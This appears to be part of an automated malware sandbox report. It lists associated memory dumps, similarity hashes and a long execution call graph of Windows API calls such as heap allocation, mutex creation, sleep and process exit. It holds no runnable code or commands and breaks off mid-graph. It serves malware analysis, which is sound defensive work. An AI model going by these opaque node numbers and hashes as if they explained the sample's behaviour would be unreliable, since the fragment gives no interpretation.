                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: recv
                                                                                                                                                                                                        • String ID: p.gc
                                                                                                                                                                                                        • API String ID: 1507349165-2259671528
                                                                                                                                                                                                        • Opcode ID: f8ce4f8ff7f1414239eab1daad6734d2c657d26e0e7338eb199e047540ef5e0d
                                                                                                                                                                                                        • Instruction ID: cc900d0e21ae52584fbf513c4ddf683bf8ad6e13b9e85518716d26137f929b58
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8ce4f8ff7f1414239eab1daad6734d2c657d26e0e7338eb199e047540ef5e0d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9231F4719002489FD714DBA8DC81FEEBBE8EB0C724F144225F911E7692CA75A8858BA0

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:1869
                                                                                                                                                                                                        Total number of Limit Nodes:15
                                                                                                                                                                                                        execution_graph 10156 631e60 10157 647f30 RtlAllocateHeap 10156->10157 10158 631e71 10157->10158 10161 64d57e 10158->10161 10164 64d551 10161->10164 10165 64d567 10164->10165 10166 64d560 10164->10166 10173 6697bb 10165->10173 10170 66974f 10166->10170 10169 631e7b 10171 6697bb RtlAllocateHeap 10170->10171 10172 669761 10171->10172 10172->10169 10176 6694f1 10173->10176 10175 6697ec 10175->10169 10177 6694fd 10176->10177 10180 66954c 10177->10180 10179 669518 10179->10175 10181 669568 10180->10181 10189 6695df 10180->10189 10182 6695bf 10181->10182 10181->10189 10190 66ecb6 10181->10190 10183 66ecb6 RtlAllocateHeap 10182->10183 10182->10189 10186 6695d5 10183->10186 10185 6695b5 10187 66acb5 RtlAllocateHeap 10185->10187 10188 66acb5 RtlAllocateHeap 10186->10188 10187->10182 10188->10189 10189->10179 10191 66ecc3 10190->10191 10192 66ecde 10190->10192 10191->10192 10193 66eccf 10191->10193 10194 66eced 10192->10194 10199 674e9c 10192->10199 10195 667443 RtlAllocateHeap 10193->10195 10206 674ecf 10194->10206 10197 66ecd4 10195->10197 10197->10185 10200 674ea7 10199->10200 10201 674ebc 10199->10201 10202 667443 RtlAllocateHeap 10200->10202 10201->10194 10203 674eac 10202->10203 10204 666b8a RtlAllocateHeap 10203->10204 10205 674eb7 10204->10205 10205->10194 10207 674ee7 10206->10207 10208 674edc 10206->10208 10210 674eef 10207->10210 10214 674ef8 10207->10214 10215 66af0b 10208->10215 10211 66acb5 RtlAllocateHeap 10210->10211 10213 674ee4 10211->10213 10212 667443 RtlAllocateHeap 10212->10213 10213->10197 10214->10212 10214->10213 10218 66af19 10215->10218 10216 667443 RtlAllocateHeap 10217 66af47 10216->10217 10217->10213 10218->10216 10218->10217 10229 632060 10234 64c5bb 10229->10234 10232 64d57e RtlAllocateHeap 10233 632076 10232->10233 10237 64c305 10234->10237 10236 63206c 10236->10232 10238 64c311 10237->10238 10239 64c31b 10237->10239 10240 64c2ce 10238->10240 10241 64c2ee 10238->10241 10239->10236 10240->10239 10246 64cc05 10240->10246 10250 64cc3a 10241->10250 10244 64c300 10244->10236 10247 64cc13 InitializeCriticalSectionEx 10246->10247 10249 64c2e7 10246->10249 10247->10249 10249->10236 10251 64cc4f RtlInitializeConditionVariable 10250->10251 10251->10244 10262 633460 10263 63346a 10262->10263 10264 63348a 10262->10264 10263->10264 10265 666b9a RtlAllocateHeap 10263->10265 10266 6334b2 10265->10266 10282 634270 10285 633a80 10282->10285 10284 63427b 10286 633ab9 10285->10286 10287 633af9 10286->10287 10288 666b9a RtlAllocateHeap 10286->10288 10287->10284 10289 633ba6 10288->10289 10292 633bf8 10289->10292 10297 633290 10289->10297 10291 633290 6 API calls 10294 633c1f 10291->10294 10292->10291 10292->10294 10293 633c28 10293->10284 10294->10293 10316 6337d0 10294->10316 10320 64c5dc 10297->10320 10299 63332b 10326 64c19a 10299->10326 10302 6332fc 10303 64c19a 5 API calls 10302->10303 10308 633310 10302->10308 10304 633337 10303->10304 10306 64c5dc GetSystemTimePreciseAsFileTime 10304->10306 10305 6332d4 10305->10299 10305->10302 10323 64bc7c 10305->10323 10307 63336f 10306->10307 10309 64c19a 5 API calls 10307->10309 10310 633376 10307->10310 10308->10292 10309->10310 10311 64c19a 5 API calls 10310->10311 10312 633397 10310->10312 10311->10312 10313 64c19a 5 API calls 10312->10313 10314 6333ab 10312->10314 10315 6333ce 10313->10315 10314->10292 10315->10292 10317 6337dc 10316->10317 10501 632400 10317->10501 10330 64c382 10320->10330 10322 64c5e9 10322->10305 10347 64baa2 10323->10347 10325 64bc8c 10325->10305 10327 64c1c2 10326->10327 10328 64c1a4 10326->10328 10327->10327 10328->10327 10353 64c1c7 10328->10353 10331 64c3d8 10330->10331 10333 64c3aa 10330->10333 10331->10333 10336 64ce9b 10331->10336 10333->10322 10334 64c42d 10334->10333 10335 64ce9b GetSystemTimePreciseAsFileTime 10334->10335 10335->10334 10337 64ceaa 10336->10337 10339 64ceb7 10336->10339 10337->10339 10340 64ce74 10337->10340 10339->10334 10343 64cb1a 10340->10343 10344 64cb37 10343->10344 10345 64cb2b GetSystemTimePreciseAsFileTime 10343->10345 10344->10339 10345->10344 10348 64bacc 10347->10348 10349 64ce9b GetSystemTimePreciseAsFileTime 10348->10349 10352 64bad4 10348->10352 10350 64baff 10349->10350 10351 64ce9b GetSystemTimePreciseAsFileTime 10350->10351 10350->10352 10351->10352 10352->10325 10358 632aa0 10353->10358 10357 64c1ef 10386 64be0f 10358->10386 10360 632abf 10378 64c12f 10360->10378 10361 632ab4 10361->10360 10389 66a531 10361->10389 10379 64c13b 10378->10379 10380 647f30 RtlAllocateHeap 10379->10380 10381 64c16d 10380->10381 10440 632670 10381->10440 10383 64c182 10457 6477e0 10383->10457 10385 64c18a 10385->10357 10409 64cb61 10386->10409 10390 66a53b 10389->10390 10391 66d6ef RtlAllocateHeap 10390->10391 10392 66a554 10390->10392 10394 66a57c 10391->10394 10393 666bfc 10392->10393 10395 668aaf 4 API calls 10392->10395 10403 668aaf 10393->10403 10396 66a5bc 10394->10396 10397 66a584 10394->10397 10400 66a5ed 10395->10400 10398 66a35f RtlAllocateHeap 10396->10398 10399 66acb5 RtlAllocateHeap 10397->10399 10401 66a5c7 10398->10401 10399->10392 10402 66acb5 RtlAllocateHeap 10401->10402 10402->10392 10404 668ab4 10403->10404 10408 668abf 10404->10408 10413 66d4f4 10404->10413 10434 66651d 10408->10434 10410 64be22 10409->10410 10411 64cb6f InitOnceExecuteOnce 10409->10411 10410->10361 10411->10410 10414 66d500 10413->10414 10415 66a688 RtlAllocateHeap 10414->10415 10419 66d527 10414->10419 10421 66d52d 10414->10421 10415->10419 10416 66d572 10417 667443 RtlAllocateHeap 10416->10417 10418 66d577 10417->10418 10420 666b8a RtlAllocateHeap 10418->10420 10419->10416 10419->10421 10433 66d55c 10419->10433 10420->10433 10422 66d5e6 10421->10422 10423 66d6db 10421->10423 10424 66d611 10421->10424 10422->10424 10437 66d4eb 10422->10437 10425 66651d 3 API calls 10423->10425 10428 66a531 4 API calls 10424->10428 10431 66d665 10424->10431 10424->10433 10427 66d6ee 10425->10427 10428->10431 10430 66d4eb 4 API calls 10430->10424 10432 66a531 4 API calls 10431->10432 10431->10433 10432->10433 10433->10408 10435 6663f7 3 API calls 10434->10435 10436 66652e 10435->10436 10438 66a531 4 API calls 10437->10438 10439 66d4f0 10438->10439 10439->10430 10462 647870 10440->10462 10442 6326c2 10443 6326e5 10442->10443 10476 648e70 10442->10476 10445 648e70 RtlAllocateHeap 10443->10445 10446 63274e 10443->10446 10445->10446 10447 6327ad 10446->10447 10449 632878 10446->10449 10448 6637dc RtlAllocateHeap 10447->10448 10452 63280b 10448->10452 10451 666b9a RtlAllocateHeap 10449->10451 10450 63283a 10450->10383 10451->10452 10452->10450 10453 666b9a RtlAllocateHeap 10452->10453 10454 632882 10453->10454 10497 66383f 10454->10497 10456 6328a5 10456->10383 10458 6477eb 10457->10458 10459 647806 10457->10459 10458->10459 10460 666b9a RtlAllocateHeap 10458->10460 10459->10385 10461 64782a 10460->10461 10463 647896 10462->10463 10464 64789d 10463->10464 10465 6478f1 10463->10465 10466 6478d2 10463->10466 10464->10442 10471 64d312 RtlAllocateHeap 10465->10471 10474 6478e6 10465->10474 10467 647929 10466->10467 10468 6478d9 10466->10468 10469 632440 RtlAllocateHeap 10467->10469 10470 64d312 RtlAllocateHeap 10468->10470 10472 6478df 10469->10472 10470->10472 10471->10474 10473 666b9a RtlAllocateHeap 10472->10473 10472->10474 10475 647933 10473->10475 10474->10442 10475->10442 10477 648fbe 10476->10477 10478 648e9b 10476->10478 10479 6491a0 RtlAllocateHeap 10477->10479 10482 648ee2 10478->10482 10483 648f0c 10478->10483 10480 648fc3 10479->10480 10481 632440 RtlAllocateHeap 10480->10481 10489 648ef3 10481->10489 10482->10480 10484 648eed 10482->10484 10485 64d312 RtlAllocateHeap 10483->10485 10483->10489 10487 64d312 RtlAllocateHeap 10484->10487 10485->10489 10486 666b9a RtlAllocateHeap 10488 648fcd 10486->10488 10487->10489 10490 632440 10488->10490 10491 648fe8 10488->10491 10494 648fee 10488->10494 10489->10486 10492 648f7c 10489->10492 10495 6637dc RtlAllocateHeap 10490->10495 10493 64d312 RtlAllocateHeap 10491->10493 10492->10443 10493->10494 10494->10443 10496 632483 10495->10496 10496->10443 10498 66384c 10497->10498 10500 663853 10497->10500 10499 668a66 RtlAllocateHeap 10498->10499 10499->10500 10500->10456 10504 64b506 10501->10504 10503 632432 10505 64b521 10504->10505 10506 668aaf 4 API calls 10505->10506 10508 64b588 10505->10508 10507 64b5cf 10506->10507 10508->10503 10509 639e74 10510 639e7c 10509->10510 10511 639f4f 10510->10511 10512 63a85b 10510->10512 10515 647f30 RtlAllocateHeap 10511->10515 10513 63a883 Sleep CreateMutexA 10512->10513 10514 666b9a RtlAllocateHeap 10512->10514 10516 63a8be 10513->10516 10514->10513 10517 63a833 10515->10517 10527 63a47d 10530 63a485 10527->10530 10528 63a558 10534 647f30 RtlAllocateHeap 10528->10534 10529 63a874 10531 666b9a RtlAllocateHeap 10529->10531 10530->10528 10530->10529 10532 63a879 10531->10532 10533 666b9a RtlAllocateHeap 10532->10533 10535 63a87e 10533->10535 10536 63a833 10534->10536 10537 63a883 Sleep CreateMutexA 10535->10537 10538 666b9a RtlAllocateHeap 10535->10538 10539 63a8be 10537->10539 10538->10537 10580 648440 10581 64848f 10580->10581 10584 64849c 10580->10584 10586 649c30 10581->10586 10583 6484f4 10584->10583 10607 649f90 10584->10607 10587 649d61 10586->10587 10590 649c55 10586->10590 10588 6491a0 RtlAllocateHeap 10587->10588 10599 649cbb 10588->10599 10589 666b9a RtlAllocateHeap 10598 649d6b 10589->10598 10591 649d5c 10590->10591 10592 649cd1 10590->10592 10593 649caa 10590->10593 10594 632440 RtlAllocateHeap 10591->10594 10597 64d312 RtlAllocateHeap 10592->10597 10592->10599 10593->10591 10595 649cb5 10593->10595 10594->10587 10596 64d312 RtlAllocateHeap 10595->10596 10596->10599 10597->10599 10600 649da0 10598->10600 10601 666b9a RtlAllocateHeap 10598->10601 10599->10589 10602 649d2c 10599->10602 10600->10584 10603 649dc6 10601->10603 10602->10584 10604 649dfa 10603->10604 10605 666b9a RtlAllocateHeap 10603->10605 10604->10584 10606 649e1e 10605->10606 10608 64a0e1 10607->10608 10611 649fb3 10607->10611 10609 6491a0 RtlAllocateHeap 10608->10609 10620 64a014 10609->10620 10610 64a0dc 10614 632440 RtlAllocateHeap 10610->10614 10611->10610 10613 64a003 10611->10613 10616 64a02d 10611->10616 10612 666b9a RtlAllocateHeap 10619 64a0eb 10612->10619 10613->10610 10615 64a00e 10613->10615 10614->10608 10617 64d312 RtlAllocateHeap 10615->10617 10618 64d312 RtlAllocateHeap 10616->10618 10616->10620 10617->10620 10618->10620 10619->10584 10620->10612 10621 64a09c 10620->10621 10621->10584 10622 64d041 10625 64d052 10622->10625 10623 64d05a 10625->10623 10626 64d0c9 10625->10626 10627 64d0d7 SleepConditionVariableCS 10626->10627 10629 64d0f0 10626->10629 10627->10629 10629->10625 10630 633c4e 10631 633c58 10630->10631 10632 633c74 10631->10632 10640 6323d0 10631->10640 10636 633c8f 10632->10636 10637 6337d0 4 API calls 10632->10637 10638 6337d0 4 API calls 10636->10638 10637->10636 10639 633c9b 10638->10639 10641 6323e4 10640->10641 10655 64b45d 10641->10655 10644 633ca0 10645 633d02 10644->10645 10648 633d12 10644->10648 10873 647bc0 10645->10873 10647 64d312 RtlAllocateHeap 10649 633d44 10647->10649 10648->10647 10650 647bc0 RtlAllocateHeap 10649->10650 10652 633dc3 10649->10652 10650->10652 10651 633e5b 10651->10632 10652->10651 10653 666b9a RtlAllocateHeap 10652->10653 10654 633e81 10653->10654 10663 663a1a 10655->10663 10657 6323ea 10657->10644 10658 64b4d5 10670 64b0dd 10658->10670 10660 64b4c8 10666 64ae86 10660->10666 10674 664e59 10663->10674 10665 64b485 10665->10657 10665->10658 10665->10660 10667 64aecf 10666->10667 10669 64aee2 10667->10669 10686 64b2cf 10667->10686 10669->10657 10671 64b111 10670->10671 10672 64b108 10670->10672 10671->10657 10673 64b2cf 5 API calls 10672->10673 10673->10671 10681 664e67 10674->10681 10676 664e5e 10676->10665 10677 66d4f4 4 API calls 10676->10677 10678 668abf 10676->10678 10677->10678 10679 66651d 3 API calls 10678->10679 10680 668af2 10679->10680 10682 664e70 10681->10682 10684 664e73 10681->10684 10682->10676 10683 664ea7 10683->10676 10684->10683 10685 668a66 RtlAllocateHeap 10684->10685 10685->10683 10687 64be0f InitOnceExecuteOnce 10686->10687 10688 64b311 10687->10688 10689 64b318 10688->10689 10697 666beb 10688->10697 10689->10669 10691 64b34e 10692 64be0f InitOnceExecuteOnce 10691->10692 10693 64b391 10692->10693 10694 64b398 10693->10694 10695 666beb 4 API calls 10693->10695 10694->10669 10696 64b3ce 10695->10696 10696->10669 10698 666bf7 10697->10698 10699 66a531 4 API calls 10698->10699 10700 666bfc 10699->10700 10701 668aaf 4 API calls 10700->10701 10702 666c26 10701->10702 10703 666c35 10702->10703 10704 666c43 10702->10704 10715 666c99 10703->10715 10736 6668bd 10704->10736 10707 666c5d 10739 66681d 10707->10739 10708 666c3f 10708->10691 10711 666c71 10713 666c93 10711->10713 10714 66acb5 RtlAllocateHeap 10711->10714 10712 666c99 RtlAllocateHeap 10712->10711 10713->10691 10714->10713 10716 666ca7 10715->10716 10717 666cc4 10715->10717 10742 667430 10716->10742 10720 666d06 10717->10720 10721 666cea 10717->10721 10728 666d2a 10720->10728 10729 666d38 10720->10729 10723 667430 RtlAllocateHeap 10721->10723 10722 667443 RtlAllocateHeap 10724 666cb4 10722->10724 10725 666cef 10723->10725 10726 666b8a RtlAllocateHeap 10724->10726 10727 667443 RtlAllocateHeap 10725->10727 10730 666cbf 10726->10730 10731 666cf6 10727->10731 10745 666e01 10728->10745 10758 666d77 10729->10758 10730->10708 10734 666b8a RtlAllocateHeap 10731->10734 10735 666d01 10734->10735 10735->10708 10803 66683a 10736->10803 10738 6668cf 10738->10707 10848 66676b 10739->10848 10743 66a688 RtlAllocateHeap 10742->10743 10744 666cac 10743->10744 10744->10722 10746 666e28 10745->10746 10747 666eee 10746->10747 10748 666e3c 10746->10748 10750 666efc 10747->10750 10751 666f0b 10747->10751 10752 666ee5 10747->10752 10754 666e56 10748->10754 10767 667177 10748->10767 10753 667443 RtlAllocateHeap 10750->10753 10776 66740d 10751->10776 10752->10735 10753->10752 10754->10751 10754->10752 10756 666e8b 10754->10756 10771 667096 10756->10771 10781 667314 10758->10781 10760 666d85 10761 666d96 10760->10761 10762 666d8a 10760->10762 10765 667177 RtlAllocateHeap 10761->10765 10763 66740d RtlAllocateHeap 10762->10763 10764 666d91 10763->10764 10764->10735 10766 666dc2 10765->10766 10766->10735 10768 667190 10767->10768 10769 6671b1 10768->10769 10770 66740d RtlAllocateHeap 10768->10770 10769->10754 10770->10769 10772 6670aa 10771->10772 10773 6670b4 10772->10773 10774 667443 RtlAllocateHeap 10772->10774 10773->10752 10775 6670bf 10774->10775 10775->10752 10777 667430 RtlAllocateHeap 10776->10777 10778 667418 10777->10778 10779 667443 RtlAllocateHeap 10778->10779 10780 66742b 10779->10780 10780->10752 10782 667338 10781->10782 10784 66733e 10782->10784 10787 667036 10782->10787 10784->10760 10785 668a66 RtlAllocateHeap 10785->10784 10786 667364 10786->10785 10788 667443 RtlAllocateHeap 10787->10788 10789 667042 10788->10789 10790 667443 RtlAllocateHeap 10789->10790 10791 667049 10790->10791 10800 66b87b 10791->10800 10794 667443 RtlAllocateHeap 10795 667064 10794->10795 10796 667068 10795->10796 10797 667443 RtlAllocateHeap 10795->10797 10796->10786 10798 66707c 10797->10798 10799 66b87b RtlAllocateHeap 10798->10799 10799->10796 10801 66b6de RtlAllocateHeap 10800->10801 10802 66705a 10801->10802 10802->10794 10804 666851 10803->10804 10805 66685a 10803->10805 10804->10738 10805->10804 10806 66a531 4 API calls 10805->10806 10807 66687a 10806->10807 10811 66b4bb 10807->10811 10812 666890 10811->10812 10813 66b4ce 10811->10813 10815 66b4e8 10812->10815 10813->10812 10819 66f46b 10813->10819 10816 66b510 10815->10816 10817 66b4fb 10815->10817 10816->10804 10817->10816 10832 66e571 10817->10832 10820 66f477 10819->10820 10821 66a531 4 API calls 10820->10821 10823 66f480 10821->10823 10822 66f4c6 10822->10812 10823->10822 10828 66f4ec 10823->10828 10825 66f4af 10825->10822 10826 668aaf 4 API calls 10825->10826 10827 66f4eb 10826->10827 10829 66f4fa 10828->10829 10831 66f507 10828->10831 10830 66f21f RtlAllocateHeap 10829->10830 10829->10831 10830->10831 10831->10825 10833 66a531 4 API calls 10832->10833 10834 66e57b 10833->10834 10837 66e489 10834->10837 10836 66e581 10836->10816 10841 66e495 10837->10841 10838 66e4b6 10838->10836 10839 66e4af 10839->10838 10840 668aaf GetPEB ExitProcess GetPEB RtlAllocateHeap 10839->10840 10842 66e528 10840->10842 10841->10839 10845 66acb5 RtlAllocateHeap 10841->10845 10843 66e564 10842->10843 10844 66a5ee GetPEB ExitProcess GetPEB RtlAllocateHeap 10842->10844 10843->10836 10846 66e555 10844->10846 10845->10839 10847 66e370 GetPEB ExitProcess GetPEB RtlAllocateHeap 10846->10847 10847->10843 10849 666793 10848->10849 10850 666779 10848->10850 10852 66679a 10849->10852 10855 6667b9 10849->10855 10861 6668fc 10850->10861 10854 666783 10852->10854 10865 666916 10852->10865 10854->10711 10854->10712 10856 666916 RtlAllocateHeap 10855->10856 10858 6667cf 10855->10858 10856->10858 10857 66740d RtlAllocateHeap 10859 6667db 10857->10859 10858->10854 10858->10857 10860 667443 RtlAllocateHeap 10859->10860 10860->10854 10862 666907 10861->10862 10863 66690f 10861->10863 10864 66acb5 RtlAllocateHeap 10862->10864 10863->10854 10864->10863 10866 6668fc RtlAllocateHeap 10865->10866 10867 666924 10866->10867 10870 666955 10867->10870 10871 66af0b RtlAllocateHeap 10870->10871 10872 666935 10871->10872 10872->10854 10874 647bd2 10873->10874 10875 647c3b 10873->10875 10877 647c0c 10874->10877 10878 647bdd 10874->10878 10876 632440 RtlAllocateHeap 10875->10876 10879 647bea 10876->10879 10881 647c29 10877->10881 10884 64d312 RtlAllocateHeap 10877->10884 10878->10875 10880 647be4 10878->10880 10882 666b9a RtlAllocateHeap 10879->10882 10887 647bf3 10879->10887 10883 64d312 RtlAllocateHeap 10880->10883 10881->10648 10885 647c45 10882->10885 10883->10879 10886 647c16 10884->10886 10886->10648 10887->10648 10895 648250 10896 648269 10895->10896 10897 64827d 10896->10897 10898 648e70 RtlAllocateHeap 10896->10898 10898->10897 10899 647c50 10902 647c9c 10899->10902 10903 647c71 10899->10903 10900 647d90 10901 6491a0 RtlAllocateHeap 10900->10901 10915 647d01 10901->10915 10902->10900 10904 647d8b 10902->10904 10906 647d17 10902->10906 10907 647cf0 10902->10907 10908 632440 RtlAllocateHeap 10904->10908 10905 666b9a RtlAllocateHeap 10912 647d9a 10905->10912 10911 64d312 RtlAllocateHeap 10906->10911 10906->10915 10907->10904 10909 647cfb 10907->10909 10908->10900 10910 64d312 RtlAllocateHeap 10909->10910 10910->10915 10911->10915 10913 647dd1 10912->10913 10914 666b9a RtlAllocateHeap 10912->10914 10916 647dec 10914->10916 10915->10905 10917 647d72 10915->10917 10918 666659 10921 6665a2 10918->10921 10920 66666b 10923 6665ae 10921->10923 10922 6665b5 10924 667443 RtlAllocateHeap 10922->10924 10923->10922 10926 6665d5 10923->10926 10925 6665ba 10924->10925 10927 666b8a RtlAllocateHeap 10925->10927 10928 6665e7 10926->10928 10929 6665da 10926->10929 10934 6665c5 10927->10934 10935 66a783 10928->10935 10930 667443 RtlAllocateHeap 10929->10930 10930->10934 10932 6665f0 10933 667443 RtlAllocateHeap 10932->10933 10932->10934 10933->10934 10934->10920 10936 66a78f 10935->10936 10939 66a827 10936->10939 10938 66a7aa 10938->10932 10941 66a84a 10939->10941 10940 66d6ef RtlAllocateHeap 10942 66a8ab 10940->10942 10941->10940 10944 66a890 10941->10944 10943 66acb5 RtlAllocateHeap 10942->10943 10943->10944 10944->10938 10968 631020 10969 647f30 RtlAllocateHeap 10968->10969 10970 631031 10969->10970 10971 64d57e RtlAllocateHeap 10970->10971 10972 63103b 10971->10972 10992 66ba2d 10993 66ba57 10992->10993 10994 66ba3d 10992->10994 10995 66ba76 10993->10995 10996 66ba5f 10993->10996 10997 667443 RtlAllocateHeap 10994->10997 10999 66683a 4 API calls 10995->10999 10998 667443 RtlAllocateHeap 10996->10998 11000 66ba42 10997->11000 11002 66ba64 10998->11002 11004 66ba4d 10999->11004 11001 666b8a RtlAllocateHeap 11000->11001 11001->11004 11003 666b8a RtlAllocateHeap 11002->11003 11003->11004 11014 647830 11015 647850 11014->11015 11015->11015 11016 647f30 RtlAllocateHeap 11015->11016 11017 647862 11016->11017 11018 634236 11019 6323d0 5 API calls 11018->11019 11020 63423f 11019->11020 11021 633ca0 RtlAllocateHeap 11020->11021 11022 63424f 11021->11022 11031 633800 11032 6338b6 11031->11032 11034 63381f 11031->11034 11033 6338e0 11041 649110 11033->11041 11034->11032 11034->11033 11038 63388d 11034->11038 11039 6338db 11034->11039 11036 6338e5 11037 647bc0 RtlAllocateHeap 11037->11032 11038->11037 11040 666b9a RtlAllocateHeap 11039->11040 11040->11033 11042 64c0e9 RtlAllocateHeap 11041->11042 11043 64911a 11042->11043 11043->11036 11044 633400 11049 632af0 11044->11049 11046 63340f 11047 6637dc RtlAllocateHeap 11046->11047 11048 633443 11047->11048 11050 6637dc RtlAllocateHeap 11049->11050 11051 632b28 11050->11051 11051->11046 11052 631000 11053 64d57e RtlAllocateHeap 11052->11053 11054 63100a 11053->11054 11085 633c07 11086 633c11 11085->11086 11087 633c1f 11086->11087 11089 633290 6 API calls 11086->11089 11088 633c28 11087->11088 11090 6337d0 4 API calls 11087->11090 11089->11087 11091 633c9b 11090->11091 11092 639a0c 11093 639a1a 11092->11093 11097 639a2e 11092->11097 11094 63a847 11093->11094 11093->11097 11095 63a883 Sleep CreateMutexA 11094->11095 11096 666b9a RtlAllocateHeap 11094->11096 11098 63a8be 11095->11098 11096->11095 11099 647870 RtlAllocateHeap 11097->11099 11100 639aa4 11099->11100 11115 635b20 11100->11115 11102 639aac 